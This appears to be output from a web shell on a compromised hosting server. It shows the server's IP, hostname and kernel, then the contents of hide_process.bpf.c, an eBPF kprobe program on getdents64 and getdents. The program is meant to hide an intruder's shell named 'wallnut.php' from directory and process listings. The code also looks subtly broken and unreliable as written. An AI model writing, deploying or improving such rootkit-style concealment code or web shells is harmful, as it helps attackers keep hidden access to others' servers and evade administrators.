uawdijnntqw1x1x1
IP : 216.73.216.123
Hostname : smartpanel.abcaweb.com
Kernel : Linux smartpanel.abcaweb.com 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
u4uwebca
/
tmp
/
..
/
www
/
..
/
.razor
/
..
/
..
/
..
/
tmp
/
hide_process.bpf.c
/
/
#include <linux/bpf.h> #include <bpf/bpf_helpers.h> #include <bpf/bpf_tracing.h> SEC("kprobe/getdents64") int BPF_KPROBE(hide_process, struct linux_dirent64* dirp) { char comm[16]; bpf_get_current_comm(comm, sizeof(comm)); #pragma unroll for (int i = 0; i < 16; i++) { if (comm[i] != "wallnut.php"[i]) { return 0; } } return -ENOENT; } SEC("kprobe/getdents") int BPF_KPROBE(hide_process32, struct linux_dirent* dirp) { char comm[16]; bpf_get_current_comm(comm, sizeof(comm)); #pragma unroll for (int i = 0; i < 16; i++) { if (comm[i] != "wallnut.php"[i]) { return 0; } } return -ENOENT; } char _license[] SEC("license") = "GPL";
/home/u4uwebca/tmp/../www/../.razor/../../../tmp/hide_process.bpf.c